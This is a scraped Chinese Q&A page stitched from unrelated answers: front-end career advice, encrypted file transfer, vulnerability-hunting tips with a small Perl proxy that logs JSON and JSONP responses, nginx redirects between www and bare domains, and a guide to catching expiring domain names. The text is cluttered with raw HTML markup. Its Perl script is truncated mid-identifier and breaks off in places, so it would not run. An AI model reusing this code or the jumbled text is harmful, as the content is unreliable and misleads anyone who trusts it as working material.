的问题,什么问题呢?不在本文讨论范畴。回到话题,现在你还认为你理解意义上的前端是前端吗?我以前以为前端是美工,但是后来我发现很多前端博客都在研究一个技术JS的各大框架,我更加确定前端并不是我理解意义上的前端,我更喜欢视觉设计,但是我依旧也是一个前端,所以前端是模糊的,甚至包括了一切。&br&&strong&前端没什么不好&/strong&&br&如果你觉得前端没有前(钱)途,那我劝你干别的行业吧,如果你确定你喜欢前端,那就听听我的一些看法,当然也纯属主观臆断,你可以拍砖。逛过一些前端博客,大部分文章都是在分享JS的几大框架技术,Jquery占很多数,那其他框架呢?所以我也有个疑问,&strong&前端难道就是JS吗?最后我的答案:是的,如果你想成为纯粹意义上的前端,JS很大部分上代表了前端。&/strong&&br&&strong&程序员眼中的前端(后端程序员和前端工程师的不同)&/strong&&br&真正意义上学习编程是在大学的时候,那时候我的一个师长,他现在是Java工程师,他给我的建议是HTML+CSS随便玩玩就好了,我不太认同他的观点还是玩了很久,我并没有停留在HTML上,而是了解了更多技术,HTML是很多技术人都不耻的语言,甚至在一些人看来HTML连编程语言都不是,这个我在大学招新时候很有感触,他们觉得HTML不值钱又是小儿科的东西,连PHP他们都觉得2个小时就能上手,那HTML他们不用看就懂了,甚至在一些无知的人看来网站开发不算真正意义上的程序,因此也就不是程序员了,因为他们的眼中只有C/C++,很多前人的建议也是学编程从C开始学起,我现在再来看这种回答,真好笑,无知的人在骗无知的人罢了。尤其再看看那些人在做着二级、三级试卷,我当时就想说哥们儿你醒醒吧,但是我还是忍住了,因为他跟我无关。&strong&所以不要以程序员的思维来看待前端,前端是快乐的,不是挑战各种技术。&/strong&&strong&前端的出发点也是用户(体验等等),程序员是以电脑为核心(算法等等)。&/strong&千万要记住前端是以用户为出发点的,而在很多公司面试前端工程师时,只考察了前端工程师的编程技巧。&br&&strong&如果你确定你想做一个优秀的前端,我的个人建议:&/strong&&br&&strong&首先,了解HTTP协议(HTTP 1.1),玩弄各大浏览器于鼓掌之中,&/strong&你是前端工程师不要跟我说你只知道IE核心的浏览器。IE系列,Firefox,Chrome,Opera,Safari都应该是你平时常用的浏览器,我经常使用chrome,其中elements,Resources,Network,Script,....这些你了解多少?还是你从来都不知道?那赶紧去了解吧。&br&&strong&其次,非常熟悉HTML+CSS+JS。&/strong&我把学习技术放到了第二位,因为你必须首先了解整个网络,你才会更快捷和全面的了解前端技术。&br&之前说过很多技术人都不耻学HTML,那我来解释&strong&为什么要先学HTML?&/strong&&br&先和大家一起梳理各类编程语言,大致分为了六大类:网页语言、解析型语言、混合型语言、编译型语言、汇编语言和机器语言,依次越来越苦逼,无论从用户还是开发者角度看待,越深入越不能让人理解,用户体验越差,当然开发者也是用户,所以也就能理解为什么会有PHP、Python,Ruby之类的解释型语言了。&br&如果你只想学习好前端技术的话,只需要了解前两层的东西,也就是网页语言和解析型语言,网页语言HTML,解析型语言PHP,Python,Ruby至少要学会一种。如果你有更多的精力,你可以跳到更高层次,学习混合型语言C#或者Java,对于编译型语言C和C++如果你想做好前端工作,你可以不用懂得的。&br&&strong&为什么前端工程师需要了解这些编程语言呢?&/strong&&br&一个WEB项目需要三种人:项目经理、前端工程师和后端程序员,他们之间需要沟通,不懂得如何沟通?如何说服?懂得能让项目进展的更顺利一些。我们回到刚才的例子——留言本,过程可以参照PHP的CGI(请求和响应等等),如果你不懂或者还是很模糊的话,我认为你还不是一个合格的前端工程师,当然你可以说你更偏向于视觉设计、用户体验之类的了。我的这种说法并不绝对,甚至如果你觉得你需要鼓励才能进步?那不好意思了,我只知道这是残酷的招聘法则,你可以去看看各公司对招聘前端的要求。&br&最后HTML5很重要,就犹如空气,看似不存在,好似不重要,但是缺少了空气,人类就无法生存,所以HTML是根本。&br&&strong&再次,艺术品的欣赏能力。&/strong&PS、切图等等这些只是工具,工具只要经常用就会的,但是欣赏能力,或者只能说是天生的了,但是也要多培养自己的艺术欣赏能力,或者说让自己时髦起来。学会欣赏学会鉴别,其他的不多说了。&br&&strong&最后,关注前端们都在做什么?&/strong&国外的我不推荐,我觉得国外的天空没那么蔚蓝。腾讯、新浪、淘宝、网易、百度……很多公司都有前端体验中心,他们的前端博客你知道不?他们在干什么?这些你了解吗,去了解他们在干什么吧,慢慢你就能培养出你的前端嗅觉了。&br&&strong&学会思考,自己去辨别真伪,&/strong&每个人都有自己的体验,本篇文章纯属一家之言,主观臆断的说法,你可以参考并自己去验证,这也是前端工程师需要学会的东西。&br&&strong&推荐几个大公司的UED相关方面的博客(从月光博客抠过来的,总结的蛮全的):&/strong&&br&1,淘宝UED &a href=&///?target=http%3A///blog& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&TaoBaoUED | 做地球上最好的 UED&i class=&icon-external&&&/i&&/a&&br&2,新浪UED &a href=&///?target=http%3A//& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&新浪UED | 一个关注用户体验、关注工作流、关注作品质量的有爱团队&i class=&icon-external&&&/i&&/a&&br&3,阿里巴巴UED &a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&阿里巴巴(中国站)用户体验设计部博客&i class=&icon-external&&&/i&&/a&&br&4,UCD大社区 &a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&UCD大社区 - 以用户为中心的设计&i class=&icon-external&&&/i&&/a&&br&5,支付宝UED:&br&交互设计:&a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&错误页面 - 支付宝 知托付!&i class=&icon-external&&&/i&&/a&&br&视觉设计:&a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&错误页面 - 支付宝 知托付!&i class=&icon-external&&&/i&&/a&&br&用户研究:&a href=&///?target=http%3A//& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&错误页面 - 支付宝 知托付!&i class=&icon-external&&&/i&&/a&&br&6,百度MUX &a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&百度MUX&i class=&icon-external&&&/i&&/a&&br&7,腾讯CDC &a href=&///?target=http%3A//& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&腾讯CDC&i class=&icon-external&&&/i&&/a&&br&8,携程UED &a href=&///?target=http%3A///blog/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&携程UED-携程旅行前端开发团队&i class=&icon-external&&&/i&&/a&&br&9,百度泛用户体验 &a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&FEX 做最专业的前端&i class=&icon-external&&&/i&&/a&&br&10,腾讯WSD &a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&腾讯MXD移动互联网设计中心&i class=&icon-external&&&/i&&/a&&br&11,微博UDC &a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&微博UDC | 让设计无“微”不至&i class=&icon-external&&&/i&&/a&&br&12,网易UEDC &a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&网易用户体验设计中心&i class=&icon-external&&&/i&&/a&&br&13,CUED-迅雷用户体验设计中心 &a href=&///?target=http%3A///& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&&br&--- 日 续写 ---&br&&br&有段时间没来知乎了,今天进来一看突然发现这篇回答赞同数暴涨,吓我一跳!!!!&br&文章是2012年年初写的,当初刚入行,瞎写了一通,改过几次,后来发现没有多少读者也就不了了之了(现在再来看内容,自己都看不下去了,我非常赞同 &a data-hash=&42aa0150898acf8cf796c& href=&///people/42aa0150898acf8cf796c& class=&member_mention& data-editable=&true& data-title=&@姚垚& data-tip=&p$b$42aa0150898acf8cf796c&&@姚垚&/a& 的观点,这篇文章其实写的很烂也很浅显)。为了对读者负责,我继续补充一些自己现在对这份职业的重新认识&br&&br&上文说的那些都是瞎扯淡,前端说简单些就包括几点:&br&&br&1. 浏览器&br&2. 切图&br&3. 语言&br&4. 框架&br&5. 项目托管&br&6. 待不充&br&&br&没时间了,晚上有空回来续写.....&br&&br&拖拽至此处上传&br&&br&拖拽至此处上传
为了能让大家第一眼阅读到最新内容,更新就写到上面了。这篇文章写于12年年初,到现在有三年多了,截至到现在赞同数494,被收藏 1199 次,不算多。问题被编辑多次之后,原回答已经不是很符合意境了,所以我还是继续补充了。技术背景:可能擅长php+js2015年1…
我的建议:&br&1. 选本好书&br&&a href=&///?target=http%3A///subject/2994925/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/subject&/span&&span class=&invisible&&/2994925/&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=http%3A///subject/4886879/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/subject&/span&&span class=&invisible&&/4886879/&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&br&2. 阅读源码&br&&a href=&///?target=https%3A///languages/JavaScript& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&/languages/Ja&/span&&span class=&invisible&&vaScript&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&br&3. 实践、实践、再实践&br&&br&4. 关注行业动态,参与开源社区&br&这几个blog至少要订阅:&br&&a href=&///?target=http%3A//www.nczonline.net/blog/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&nczonline.net/blog/&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=http%3A///& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&/&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=http%3A///& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=http%3A///& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=http%3A///r/javascript/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&/r/javascript&/span&&span class=&invisible&&/&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&
我的建议:1. 选本好书2. 阅读源码3. 实践、实践、再实践4. 关注行业动态,参与开源社区这几个blog至少要订阅:…
这个时候会用基于ssh的scp,sftp
这个时候会用基于ssh的scp,sftp
FTP协议本身无法加密传输的文件,但是可以通过基于SSL的FTP来实现加密传输,即使用FTPs来传输文件,应该大多数的FTP软件都支持的,你只要在软件设置修改下就可以实现了。
FTP协议本身无法加密传输的文件,但是可以通过基于SSL的FTP来实现加密传输,即使用FTPs来传输文件,应该大多数的FTP软件都支持的,你只要在软件设置修改下就可以实现了。
586 人关注
114 个回答
11066 人关注
235 个回答
445 人关注
193 人关注
7344 人关注
1112 个回答}
善用已有工具,比如awvs ,burp,subdomainburte等等。大牛好像都鄙视工具党,不过如果你只是想高效挖洞或者节省时间,用工具辅助无疑是最佳选择。创造适合自己的小工具,有时候已有的工具满足不了自己的需求,就需要开发适合自己的小工具。比如openssl 心…
搞点适合自己用的小工具,将时间重复利用。&br&比如说我前些天搞了个小脚本,上班的时候打开,快下班的时候看看,中间在做别的事情。&br&然而,结果颇丰。&br&&br&&div class=&highlight&&&pre&&code class=&language-text&&#!/usr/bin/perl
use Mojo::UserA
use Mojo::Server::D
use Bloom::F
my $bloom_filter = Bloom::Filter-&new( error_rate =& 0.001, capacity =& 100000 );
my $ua = Mojo::UserAgent-&
my $daemon = Mojo::Server::Daemon-&new( listen =& ['http://*:3128'])-&unsubscribe('request');
$daemon-&on(request =& sub {
my ($daemon, $client_tx) = @_;
$ua-&start(Mojo::Transaction::HTTP-&new(req =& $client_tx-&req) =& sub {
my ($ua, $proxy_tx) = @_;
my $response = $proxy_tx-&
$client_tx-&res($response)-&
my $url = $proxy_tx-&req-&url-&to_
if( $url =~ /jsonp|callback/ || defined($response-&headers-&content_type) && $response-&headers-&content_type =~ /json/) {
my $json = $response-&
if( ! $bloom_filter-&check($url.$json) ) {
$bloom_filter-&add($url.$json);
print &$url\n$json\n\n&;
&/code&&/pre&&/div&
搞点适合自己用的小工具,将时间重复利用。比如说我前些天搞了个小脚本,上班的时候打开,快下班的时候看看,中间在做别的事情。然而,结果颇丰。#!/usr/bin/perl
use Mojo::UserA
use Mojo::Server::D
use Bloom::F…
这个问题我琢磨过很久,分享一下心得。&br&&blockquote&1、不加www有哪些好处和坏处?&/blockquote&不加 www 的裸域名好处主要是域名更加简短、容易记忆。坏处就多了,讲几个主要的技术原因:&ul&&li&裸域名只能绑定 DNS 的 A 记录,不能绑定 CNAME 记录。也就是说你不能把裸域设定为另外域名的别名。很多时候这对管理不是很方便,特别是使用第三方托管服务的时候。如果第三方迁移服务器导致 IP 地址变更,你必须自己去更改 DNS 的 A 记录。&br&&br&比如你的个人博客采用 Tumblr 的服务,如果使用裸域,你需要手动将你域名的 A 地址指向 Tumblr 指定的 IP 地址。Tumblr 如果迁移了机房,所有通过这种方式设定个人域名的用户都必须更改自己的 DNS 才能继续使用,否则服务就会中断。使用子域名的 CNAME 记录就相对简单很多,只需要将 www 子域名的 CNAME 字段指向 &a href=&///?target=http%3A//& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& 这个域名,之后如果 Tumblr 更改 IP 地址,他们只需要重新设置 &a href=&///?target=http%3A//& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& 这个域名的 A 记录,而无需要求每个用户去更改 DNS 记录。&br&&br&这个技术上的限制导致许多大型的第三方服务商不支持使用裸域。典型的如 Google 的服务,现在都不能使用裸域。Google 的服务用户基数大,不得不采用 DNS 级别的分布式,使用到的 IP 地址太多,而且变动大。让用户绑定 A 记录的话不利于负载均衡,维护起来也是几乎不可能完成的任务。同理,大部分 CDN 也不支持裸域。&/li&&li&裸域的 cookie 的作用范围太大。假如知乎也采用裸域,那么知乎所有 cookie 的作用范围就包括 &a href=&& class=&internal&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&/a& 下的所有子域名。也就是说访问 &a href=&& class=&internal&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&/a& 和 &a href=&& class=&internal&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&/a& 的时候都会带上 &a href=&& class=&internal&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&/a& 裸域页面设置的 cookie。从安全、隐私、可扩展性、以及管理的角度而言,这对很多大型网站来说是不可接受的。&/li&&li&URL 的正则匹配,如果带 www 前缀的并且以 .com/.net/.org 结尾的,通常成功的机会要大很多。这个你会在许多文本编辑器里面遇到。如果 URL 不是 www 开头,并且也不是三大顶级域名结尾的,匹配成功的概率就要小很多。这是使用过程中有时候会让人很抓狂的点,重不重要全看你的用途和场合了。&/li&&/ul&&br&另外一点非技术上的考量:用 www 子域名的好处体现在线下的环境,比如户外广告、报纸杂志、语音广播、语音电话等使用场合,www 这个前缀(不管是视觉的还是听觉的)能够很明确的提醒受众,这个信息片段是一个网站。有人会说加上 http:// 前缀也能解决这个问题,但现在随着以 Chrome/Safari 为首的浏览器都开始在地址栏里隐藏 http:// 协议前缀了,普通用户对于 http:// 这几个字符的理解会越来越模糊,所以如果是线下的话,保留 www 这个 visual/vocal cue 还是有一定意义的。&br&&br&总的来说对于大访问量或多子域名的网站来说,不建议使用裸域。小流量或子域名少的网站的话就看个人爱好了。我挺喜欢裸域的。最近几年流行起来的「单页网页应用」(Single Page Web App) 也是以采用裸域的居多,Twitter
算是一例。&br&&br&&blockquote&2、去掉www是否会影响网站的SEO(主要是排名和收录)?(前提是过去有加www)&/blockquote&早先裸域刚开始流行的时候确实有传闻说不利于 SEO,但现在看来似乎并无任何问题。如果有的话也是搜索引擎的 bug,给他们提一下他们应该会很乐意去改。Google 的站长工具里面有工具可以帮助你做 URL 迁移的,可以有效的解决这个问题,再配合下一部分的跳转,不用担心对 SEO 有任何负面影响。&br&&blockquote&3、用什么方式去跳转最好?(如301)&/blockquote&不管你决定使用还是不使用裸域,最好不要在同时保留 www 前缀和裸域的 URL,这样既不方便用户的浏览器区分访问历史,也会对你做访问统计带来不少麻烦。最佳的方式是采用 301 跳转,并且跳转的时候保留 URL 里域名后的全部内容。比如,如果你决定使用裸域 ,那么请务必将 &br&
/foo/bar?spam=egg &br&301 跳转到 &br&
/foo/bar?spam=egg &br&去。或者反过来,如果你决定不使用裸域,那么请务必将&br&
/foo/bar?spam=egg &br&301 跳转到&br&
/foo/bar?spam=egg &br&&br&这样的跳转需要在 web 服务器里单独配置,很多 DNS 管理界面提供的简单的跳转到新域名的根目录无法实现这样的功能(仅仅跳到 / ),对用户体验和搜索引擎 SEO 而言都是非常糟糕的。&br&&br&下面给出如何在 nginx 里面实现上述的跳转:&div class=&highlight&&&pre&&code class=&language-nginx&&&span class=&c1&&# redirect http(s):// to http(s)://&/span&
&span class=&k&&server&/span& &span class=&p&&{&/span&
&span class=&kn&&server_name&/span& &span class=&s&&&/span&&span class=&p&&;&/span&
&span class=&kn&&return&/span& &span class=&mi&&301&/span& &span class=&nv&&$scheme://$request_uri&/span&&span class=&p&&;&/span&
&span class=&p&&}&/span&
&span class=&c1&&# redirect http(s):// to http(s)://&/span&
&span class=&k&&server&/span& &span class=&p&&{&/span&
&span class=&kn&&server_name&/span& &span class=&s&&&/span&&span class=&p&&;&/span&
&span class=&kn&&return&/span& &span class=&mi&&301&/span& &span class=&nv&&$scheme://www.$host$request_uri&/span&&span class=&p&&;&/span&
&span class=&p&&}&/span&
&/code&&/pre&&/div&
这个问题我琢磨过很久,分享一下心得。1、不加www有哪些好处和坏处?不加 www 的裸域名好处主要是域名更加简短、容易记忆。坏处就多了,讲几个主要的技术原因:裸域名只能绑定 DNS 的 A 记录,不能绑定 CNAME 记录。也就是说你不能把裸域设定为另外域名的别…
作为安全界的人。当然要推荐下libmproxy了。
作为安全界的人。当然要推荐下libmproxy了。
因为个人兴趣, 简单做过一些域名抢注方面的事情,
分 初级, 中级, 高级三个部分说一下, 希望大家都能有所得.&br&&br&&b&### 初级.
怎么注册刚过期域名 ###&/b&&br&&br&&b&1. 查看具体删除时间:&/b&&ul&&li&某域名过期/删除时间查询: &a href=&///?target=http%3A///DomainDel& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&域名删除时间查询&i class=&icon-external&&&/i&&/a&&/li&&li&最近可抢注域名查询 (国际): &a href=&///?target=http%3A///viewlist.aspx& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&& : Pending Delete List&i class=&icon-external&&&/i&&/a&&br&&/li&&li&最近可抢注域名查询 (国内): &a href=&///?target=http%3A///book/expiredendomainlist& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&易名:过期域名预订列表&i class=&icon-external&&&/i&&/a&&/li&&/ul&&b&2.
预订抢注. &/b&&br&&ul&&li& 国内域名抢注: 去 ename,
等申请抢注&br&&/li&&ul&&li&好处是比较便宜,
国内域名成功较高,
国际域名成功较低, 并非很好的域名, 可以在此预订&/li&&/ul&&li& 国外域名抢注: 去 3个国外域名网站抢注: namejet, pool, snapnames &br&&/li&&ul&&li&好处是国际域名成功率高, 另外还有一些把抢注作为副业的注册商 name, godaddy 等也可以尝试一下.&/li&&/ul&&li& 品相不太好或只有你自己能理解意思的域名:
选择一家可信且相熟的机构,肉身自由发挥即可.&/li&&ul&&li&国内域名删除时间:
4点30 (北京时间)&/li&&li&国际域名删除时间:
2点~4点 (北京时间)&/li&&li&国内比较可信的服务商: &a href=&///?target=http%3A///ggfw/hyzl/yxymzcfwjghdljgtj/59.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&2012年度注册服务机构服务水平评定结果&i class=&icon-external&&&/i&&/a&&/li&&/ul&&/ul&&b&3.
竞价&/b&&br&&ul&&li& 上面的只是预订,
好域名一般不止一个人盯上,
这时就要时刻盯着最终竞价的结果,
每家注册商竞价的规则不同, 但大部分都是到竞价快结束时, 如有出价,会再将结束时间延长一些这样, 就不展开说了. &/li&&/ul&&br&&b&### 中级,
为什么这样注册过期域名 ###&/b&&br&&br&想要详细了解过期域名注册的信息及过程, 需要提前做一些功课:&br&&br&&b&1. 域名生态周期 &/b&&br&
其他同学的回答里也提到了,
域名有很多种状态,
和抢注有关的有以下四种:&br&&img src=&/2c1a09290ab6cbc3c77acef372afb933_b.jpg& data-rawwidth=&500& data-rawheight=&500& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&/2c1a09290ab6cbc3c77acef372afb933_r.jpg&&&br&&ul&&li&活动状态 : 就是正在使用的,
如果你想要这个域名, 那要好好盯着 whois里面的过期时间..
年复一年.&/li&&li&保留状态 : 已经到了过期时间,
但还在注册商手中,
这时候可以进行续费, 并且没有额外的费用, 具体的时间需要看注册商的实力以及和 ICANN的关系, 越大的注册商一般这个期限可以留的越长.
一般是30天.
&/li&&ul&&li&例如 你在 日注册的域名,
日域名过期了,
日~ 日 你可以对域名进行续费, 并且不用多交钱. 前提是你选择的注册商还不错, 拿到了30天的赎回期域名保留权.&/li&&/ul&&br&&li&赎回状态:
如果很不幸,
没赶得及在保留状态续费域名,
域名会改变状态为 &赎回等待&.
这时候就需要多交钱才能重新得到域名所有权,
在这个状态的域名已经一只脚踏进了坟墓, 因为价格昂贵,不是很好的域名一般都会选择放弃.
ICANN 给出每次执行EPP命令的价格 是 40美元 ( 赎回也是EPP命令之一 ), 至于注册商给用户要多少钱就是他的事了, 一般有良心注册商的给的价格会是注册价格的10倍左右. 这是域名删除期的第一个阶段. &/li&&br&&li&等待删除状态:
这时候注册商的什么操作都不管用了,
老老实实等删除吧.
这是域名删除期的第二个阶段 ( 最后一个阶段是
咔嚓.. 删了. ). &/li&&br&&li&Pre-Relase 状态:
咦? 不是相关的是四种状态吗? pre-release状态怎么冒出来的?
这个状态其实是注册商 &私设& 的一个状态 ( 为了准确, 我翻了很多 ICANN 公布的档案和协议, 的确没有任何地方出现这个状态 ) . 但是 ICANN 并没有对其做出反应, 现在成了一个约定俗成的东西,被大家所接受。
那么 注册商为什么要设置这样一个状态, 它有什么用哪? &/li&&ul&&li&其实是注册商的把戏,归根结低还是为了多赚钱. &/li&&li&当一个还不错的域名经过了保留状态,
进入赎回期之时,
注册商觉得 这个傻小子现在还没续费, 应该不会再续费这个域名了,
这么个域名直接交给ICANN 删掉太可惜了, 自己什么也得不到, 怎么办哪?&/li&&li&贴心的几大抢注巨头出现了, 说你可以把域名让我来竞拍, 如果拍出去了 最后傻小子也没续费,
我分一部分钱给你.
如果拍出去了, 傻小子忽然肯花高价续费了, 那就再还给傻小子, 至于那些竞拍的人,道个歉就是,
你也能赚个赎回的差价.
注册商一听, 感觉不错, 自己怎么着都有钱拿, 于是pre-release 状态就这么产生了. &/li&&li&pre-release 状态严格来说属于赎回期,
所以域名所有者可进行高价续费,
但由于也在抢注巨头手中, 所以大家也可以去和注册商有协议的抢注商那里预订和竞价. &/li&&li&目前我只在 namejet 和 snapnames 两家见到过这种状态的域名.&/li&&li&我在上面吃过大亏.&/li&&/ul&&/ul&&b&2. 域名的将死之日&/b&&br&&ul&&li&一个正常的&域名轮回时长&是:
域名使用时间
续费时间 + 赎回时间 +
准备删除时间&/li&&li&这个时长会被注册商用各种手段来打破,
ICANN 对注册商有各种政策, 其中一条是 在域名付费5天内可随时撤销, 在付费5天以上30天内 可申请撤销,
所以很多注册商在域名过期之时会先续费一年, 如果在删除期到达之时还没有人高价赎回, 同同时又没有抢注商找他们洽谈, 自己又看不上这个域名的话, 才扔给 ICANN 回炉. 如果满足上面任意一点, 这个流程就会被打破.
类似的手段应该还有不少. &/li&&li&值得庆幸, 大部分域名的轮回时长还是遵守上面流程的.
&/li&&/ul&好吧, 里面这么多道道, 到底域名真正被删除的时间是多少哪?
我们的肉身什么时候才可以参与抢注? 其实对于我们, 不用想那么多, 这些我们只要了解就行了, 做好真正删除时间和自己心里预估时间不一致的准备, 看着下面几个地方等着即可,
&br&&ul&&li&找到域名所属的注册商, 了解域名注册商拿到的政策 ( 域名保留期的时长. )&/li&&li&紧盯域名的状态 &/li&&li&紧盯ICANN公布的近期要删除域名列表 &/li&&li&紧盯代注商公布的可抢注列表&/li&&/ul&&b&3. 你的对手&/b&&br&一般情况下, 如果不是肉身亲自上阵,
你的对手分为两个阶段:
抢注阶段 和 竞价阶段. &br&&ul&&li&
抢注阶段 :
一个稍微好点的域名, 选择一个或几个合适的代注商绝对是有必要的,
域名界也有28原则 甚至更高,
每年优质域名的80% ~ 90% 都被 10% ~ 20%的抢注巨头抢到,
那么怎么选择哪?
我的原则是好域名全网预订,
稍好域名看关系,
比如enom 和 namejet 本来就是一家,
enom 本身挂的抢注平台就是 namejet , 所以 enom 想卖点pre-release 的域名就会挂在 namejet 上, 如果你想抢这个域名, 那么在namejet上提前预订, 变数对你来说就会小很多,
这种技巧会帮你淘汰一批对手 ( 一般来说好点的域名还是要全网预订的,
很多网站只要押金 或填个信用卡号, 只预订抢注不成功也不交钱 ). &/li&&li&
竞价阶段 :
这个和传统拍卖很类似,
并且更熬人,
因为大部分的竞价都要持续3天以上,
并且我上面也提到, 越接近结束时间竞争越激烈, 可恨的是 注册商都会使用这一招, 当竞价接近结束时间时, 自动加一段时间.. 让好域名总会到达一个让他们满意的价格 而杜绝了人们想在最后一刻加价的投机心理.
注册商的另外一个手段是闯入竞价,
可以让一些最早没有参加抢注的人缴纳一部分&闯入费&
如果最终竞价成功, 闯入费退换,
竞价失败, 闯入费不退.
所以每个闯入者都可认为是对域名志在必得的人 价格也就会更高. &/li&&li&
给自己设定心里价位, 理性一点, 因为最终竞拍价格超过域名当前所值价格的例子有太多. &/li&&/ul&&br&&b&### 高级,
更多的知识及提高成功率 ###&/b&&br&&br&&b&1. 更多的知识&/b&&br&
上面我无数次的提到了 ICANN ,
它是干什么的哪?
从1985年第一个域名&a href=&///?target=http%3A//nordu.net& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&nordu.net&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&算起,
域名出现已经 28年了,
在1992年之前, 域名注册免费, 直到 1993年 NSI 和美国政府签合同, 独家代理com, net, org 三个顶级通用域名, 才被NSI以每年100美元的价格收取费用, 1997年之后 NSI 每年卖域名的收益就达到近2亿美元,
美国政府觉得不能这么搞了,
垄断的太彻底.
并且接触互联网比较早的朋友应该都记得, 1998年的时候, 有大量关于域名被抢注, 申请申诉, 仲裁的新闻, 另NSI深陷其中. 再加上世界其他国家对于美国一家公司来管理这些全球性通用域名很不满意。
所以美国政府在1998年解除了与 NSI的合同, 并成非盈利组织 ICANN 来替代 IANA的职责 , 管理网络资源.
2009年 ICANN 独立于美国政府管辖之外, 真正成为国际组织. &br&&br&ICANN 主要管理 四件事,
通用顶级域名及国家和地区顶级域名, dns 根服务器. 在ICANN 开始管理域名之前,
对于域名过期的时间是有些混乱的, 除了规定到期60天之内可以继续续费之外,
并没有透明化过期时间, 完全NSI自己说了算 (我的观点来源于当时论坛上的帖子: &a href=&///?target=http%3A//ask.slashdot.org/story/00/06/16/1941232/what-should-happen-to-expired-domains& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&What Should Happen To Expired Domains?&i class=&icon-external&&&/i&&/a& 和 IDG的新闻: &a href=&///?target=http%3A///article/32805/article.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&NSI Faces Domain Name &Hoarding& Suit&i class=&icon-external&&&/i&&/a&
关于过期60天可续费的说明 参见 &a href=&///?target=http%3A///alan/articles/domain2a.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&A Site By Any Other Name: Domain Name Issues for Canadian Organizations&i class=&icon-external&&&/i&&/a& 文章中对NSI 的描述 ) , ICANN接手之后好了很多。&br&&br&ICANN 对于域名过期做出的一些工作如下:&br&&ul&&li&1999年 招标第一批通用顶级域名注册商5位, 引入公平竞争机制,
令通用顶级域名价格下降 (抢注价格也下降):
&a href=&///?target=http%3A//www.icann.org/zh/resources/registrars/accreditation/policy-statement& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&注册商委任政策声明&i class=&icon-external&&&/i&&/a&&/li&&li& 2001 年,
和注册商的协议中规定,
注册商在域名过期后必须给注册人留有时间来赎回. &/li&&li& 2004 年,
制定过期域名删除政策&/li&&li& 2008 年,
再次明确注册人在域名过期后需有足够的时候将域名恢复: &a href=&///?target=http%3A//www.icann.org/zh/resources/policy/background/domain-name-recovery& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&过期域名恢复&i class=&icon-external&&&/i&&/a&&/li&&/ul&&br&&b&2. 抢注巨头们为什么成功率很高.&/b&&br&&br&
如果大家可以用技术的思维想一下,
就不难明白, 每当域名被删除的瞬间,
其实就是数据库里一条数据的清空, 主键是域名,
那怎样才能在它清空时快速的插入一条同主键的新信息哪?
